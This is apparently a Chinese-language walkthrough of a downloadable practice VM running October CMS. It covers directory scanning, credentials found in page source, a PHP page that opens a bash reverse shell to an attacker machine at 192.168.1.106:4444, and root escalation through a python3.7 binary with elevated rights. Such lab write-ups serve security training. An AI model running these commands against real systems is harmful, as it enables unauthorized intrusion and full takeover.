环境准备

靶机链接：百度网盘 请输入提取码

提取码：3e4s

虚拟机网络链接模式：桥接模式

攻击机系统：kali linux 2021.1

信息收集

1.探测目标靶机ip。

2.探测靶机开放端口和服务情况。

漏洞探测

1.访问网页

2.用dirsearch扫描目录

dirsearch -u 192.168.1.101

3.访问目录是一个登录界面

4.查看下8080端口的源码，发现一个超链接信息

5.访问这个信息，发现用户名，密码

user - admin

password - adminadmin2

6.成功登录第三步的登录界面

漏洞利用

1.谷歌下发现这个October（十月）是一个用php语言搭建的cms

2.上传不了文件

3.虽然不能上传文件，但可以添加一个网页

4.保存之后，点击preview ; 发现报错，位置在右下角的code,这应该要php代码

5.直接谷歌 october cms code reverse shell

6.直接将查到的信息粘贴进code里 function onStart() { echo 123; }

7.再点击preview后没有报错，说明成功添加了一个网页

8.这次直接把code下面换成反弹shell的php代码，用exech函数来执行

function onStart() { echo exec('bash -c "bash -i >& /dev/tcp/192.168.1.106/4444 0>&1"'); }

权限提升

1.开启监听后，点击preview即可回弹shell

2.发现python3.7有root权限

3.直接提权，成功拿下！！！

/usr/bin/python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'